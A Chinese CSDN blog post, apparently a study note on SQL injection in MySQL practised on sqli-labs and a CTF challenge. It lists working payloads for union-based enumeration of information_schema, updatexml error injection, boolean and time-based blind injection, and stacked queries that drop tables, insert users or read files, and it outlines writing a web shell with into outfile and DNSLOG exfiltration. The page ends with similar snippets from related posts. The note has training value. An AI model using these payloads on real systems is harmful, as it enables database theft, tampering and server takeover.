SQL注入学习记录一

最新推荐文章于 2023-03-24 20:37:44 发布
VIP文章 最新推荐文章于 2023-03-24 20:37:44 发布
阅读量707 收藏 4
点赞数
分类专栏: 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuermon/article/details/113948183
版权

前置知识:

1.mysql数据库的一些基本使用:增删改查

2.python脚本的使用

3.了解php中常见的与mysql相关的函数和类

0x01:数据库基础

1.基础操作

查看库名:
mysql> show databases;
创建库:
mysql> creat database test;
删除库:
mysql> drop database test;
使用库:
mysql> user test
创建表:
mysql> create table test(
-> `id` int(11),
-> `name` varchar(255)
->);

表的一些基本操作:

1.insert(增
	insert into test values('1','yer');
2.delete(删
	delete from test where xxxx;
3.update(改
	update test set name='x' where id = 1;
4.select(查
	select * from test;
	# * 实现输出所有字段

2.常用的变量、符号、函数

常用变量:
database() //查看当前数据名
user() //用户
version() //mysql版本
@@basedir //安装路径

逻辑运算符
1.& and
2.|| or
3.^ xor

常用函数
1.字符串截取:
substr(database(),1,1) //从1位置开始截取长度为1  substring
mid(database(),1,1)
left(database(),1) //左边开始截取长度为1
right(database(),1)
2.编码函数
ascii()
hex()
char()
3.文件函数
load_file //读取文件内容
0x02:闭合

1.闭合

如果语句中有多余的和单引号或者其他符号就会报错,所有要进行闭合

常见注释符:

%23(#)
--+
;%00  //利用00截断
`
or '1'='1

ban了注释符和单引号

使用反斜杠进行转义
0x03:常见注入方法

1.联合查询注入

基本要求:
1.查询列数必须一致
2.查询语句的查询的各列类型、顺序最好一致

步骤:
1.闭合
2.判断字段数
3.判断结果输出位置
4.爆库、爆表、爆列
#order by:如果后面接的是整形的话,根据第几个字段进行排序
#union:合并结果
#information_schema数据库中,table表提供关于数据库中表的信息,columns表提供表中列信息

利用sqlilabs进行试验

查询字段数:
order by 4
查询结果输出位置:
union select 1,2,3
爆库:
union select 1,2,database()
爆表:
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
爆列:
union select 1,2,group_concat(column_name) from information_schema.columns where table_name=''

2.报错注入

在没法用联合查询时使用,报错注入就是利用了数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误信息中

原理:

路径写入其他格式,就会报错并且会返回我们写入非法格式内容,我们可以利用这个得到我们想得到的内容

tips:
报错注入有长度限制,不同的函数限制不一样

常用函数:

1.updatexml:更新xml文档的函数
2.extractvalue:对xml文档进行查询的函数

//updatexml的最大长度是32位的,所以有所局限,如果密码长度超过了32位就不会被显示出来,可以用right函数

常用语句:

updatexml(1,concat(0x7e,database(),0x7e),1)
//之后修改中间concat的语句即可

3.盲注

根据sqlilabs进行学习

只有两种回显(永真 永假)的时候,为布尔盲注

步骤:
1.闭合
2.找到永真和永假的两种情况
3.利用这两种情况进行对数据进行一位一位的获取

涉及函数:
substr
ascii

语句:

and ascii(substr(database(),1,1))>1

通过时间差导致的两种不同的回显的注入,为时间盲注

时间盲注中可以使用if表达式和sleep函数
//if(expr1,1,sleep(5))
//如果expr1为true则搜索1,反之则触发sleep实现延时差

1.sleep
2.benchmarkdui
3.笛卡尔积

爆破还可以利用python脚本

4.堆叠注入

mysql

1' ;show tables# (查看表)
1' ;create table test like users#(创建新表)
1' ;drop table test#(删除新创建的表)
1' ;select 1,2,3#(查询数据)
1' ;select load_file('c:/tmpupbbn.php')#(加载文件)
1' ;insert into users(id,username,password)
values('100','new','new')#(修改数据)
1' ;rename tables

利用 HANDLER 读取数据

1';handler ` ` open;handler ` ` read first;handler ` ` close;#
0x04:文件读写

可以将数据库中的数据写入文件中

条件:

1.设置security-file-priv为Null
2.设置路径
3.文件不存在
4.有权限

文件读取函数:

load_file('文件绝对路径')

写文件函数:

into outfile
into dumpfile
//区别在于,因为into outfile函数会在行末端写入新行更致命的是会转义换行符,所有如果是利用mydql写一些dll或者其他二进制可执行文件,那么这个文件可能会被破坏,这时候我们用into dumpfile就能导出一个完整能执行的二进制文件

写文件–>写shell

读文件—DNSLOG外带

DNSLOG
在这里插入图片描述

前置知识:

1.UNC路径:

(只存在于windows中

unc路径就是类似\\softer这样的形式的网络路径
格式:\\servername\sharename 其中servername是服务器名,sharename是共享资源的名称

条件:

1.设置security-file-priv为null
2.目标为windows

学习资料:

https://www.anquanke.con/post/id/205376

[BJDCTF 2nd]简单注入

布尔盲注

0x01:打开场景

最低0.47元/天 解锁文章
ameuu
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入练习之bool盲注
windStudyer的专栏
05-22 1108
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入点
WEB安全原理(1)——SQL注入
yuluotianjin的博客
09-01 564
1.Union注入 如果通过sql注入,页面上能获取预期信息,则可使用Union注入。 (1)判断是否存在注入点(区分下是数字型注入还是字符型注入) id=1 # 正常回值 id=1' # 异常回值 id=1 and 1=1 # 正常回值 id=1 and 1=2 # 异常回值 (2)判断表中的字段数 id=1 order by [1,2,3,……] 使用order by语句,后面跟随具体数字,这些数字可用于指代表中字段名,观察数字从1开始递增到哪个数字为止,界面回值均会正常,则那个终止的数字则为字段
关于SQL的各种注入
qq_73607577的博客
03-24 1573
SQL注入
字符串截取
qq_42129143的博客
05-22 241
1、slice() 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数和第一个参数的差, 如果参数是负数,则将该值加上字符串长度转为正值,如果第一个参数大于第二个参数,返回空字符串2、substring 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数与第一个参数的差 如果参数是负数,则将该值转换...
mysql数据库sql注入各种函数必须知道的知识
weixin_44286136的博客
05-20 511
数据库名:database() 数据库版本: version() 数据库用户: user() 操作系统: @@version_compile_os 系统用户名: system_user() 当前用户名: current_user 连接数据库的用户名:session_user() 读取数据库路径:@@datadir MYSQL安装路径:@@basedir 储存所有表名信息的表 : information_schema.tables 表名 : table_name 数据库名: table_schema 列名 :
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
PHPSQL注入漏洞学习
01-21
详细讲解了PHPsql注入漏洞的类型,及其防范措施,对开发网站,深入了解sql的人会有一定的帮助。
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
sql注入笔记
03-15
sql注入笔记
超级SQL注入工具
04-08
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
SQL注入盲注基础
m0_62177883的博客
07-26 1704
如下,就取出了username下的全部数据内容这里,可以在2的位置写上username,3的位置写上password,就可以的到全部数据?指在SQL注入的过程中,找到注入点后,执行SQL语句后,选择的数据或者错误信息不能回显到前端页面。这里需要利用一些方法进行判断或者猜测,这个过程称之为盲注。第八关就用到盲注的方法。因为当输入?id=1时,出现的是只有两种显示,输入正确的语句,就显示youarein......,输入错误的东西,就不显示内容。.....................
sql server 从左侧截取不固定长度_sql盲注布尔注入
weixin_39890289的博客
12-09 183
sql盲注:从执行结果上无法从页面上看到之行结果无法分析sql执行过程,甚至无法得知是否运行盲注相对复杂一.在安全级别为LOW基于布尔的盲注-注入点及类型判断1.php代码分析先检查一下User Id 是否为空,如果为空执行下列操作,先赋值id,之后再数据库中查询数据,将结果输出给result,将结果集中行的数量,如果大于0,输出User ID存在数据库中,否则发送数据包头并输出不存在数...
漏洞整理之SQL注入
Fengchen的博客
10-18 355
1 SQL注入 1.1 什么是SQL? SQL是Structured Quevy Language(结构化查询语言)的缩写。SQL是专为数据库而建立的操作命令集,是一种功能齐全 的数据库语言。 1.2 什么是SQL注入SQL注入攻击包括从客户端向应用程序输入的SQL查询注入或“注入”恶意数据。 一个成功的SQL注入攻击可以做到以下内容: 读取或修改数据库中的敏感数据; 对数据库执行管理操...
SQL注入详解
热门推荐
qq_48904485的博客
03-21 1万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
布尔盲注练习
weixin_60777183的博客
08-27 234
盲注需要掌握的几个函数: 1.length() 判断字符串的长度 举例:and length(database())>1 2.substr() 截取字符串的函数 格式:substr(str,pos,len) substr(字符串内容,从哪里切,切多长) 可用于:and substr(database(),1,1)=’a’ 来判断数据库的第一位是否为a 3.ascii() 返回字符的asc码 加入ascii码判断,可改为: ?id=1 and ascii(substr(database(),
SQL注入原理简解
weixin_49182737的博客
05-11 3756
SQL注入原理简单介绍
sql注入--基本注入语句学习笔记
超人学飞的日子
05-31 1万+
接触到sql注入知识,做了一些常识,这里做一个完整的记录。一,联合查询联合查询是拼接在原查询语句下,要求结果数量与原结果数量相同。1,2,3并无特殊含义,换成其他数字或字符串也可以,这里只是站位表示一下。二,注释语句sql注入时要注释掉后面的部分才能使整个语句正确运行,这里介绍几种方法。1,#注释符此时后面的limit 0,30并没有生效。2,--空格注释符 注意在--后面有个空格,否则会报错,不...
sql注入select/union select
@一只躺平的猪@的博客
07-14 2863
selectselect 1 from table、 select count(1) from table、select sum(1) from table union select:union语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
渗透学习-sql注入过程中遇到的问题-针对sort=left(version(),1)的解释-对order by后接字符串的理解
qq_43696276的博客
06-07 379
这里主要是针对于在我打靶场过程中遇到的一些问题进行解释,即在sqllibs的Less46关使用sort=left(version(),1)依旧能够正常回显的原因,以及对order by后接上字符串即varchar字符类型也能正常回显的解释。...
sql注入 培训材料
最新发布
08-08
1. 什么是 SQL 注入? SQL 注入是一种常见的网络安全漏洞,攻击者利用此漏洞在应用程序的数据库查询中插入恶意的 SQL 代码。这可能导致攻击者获取敏感信息、修改数据或执行其他恶意操作。 2. 注入攻击的原理 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值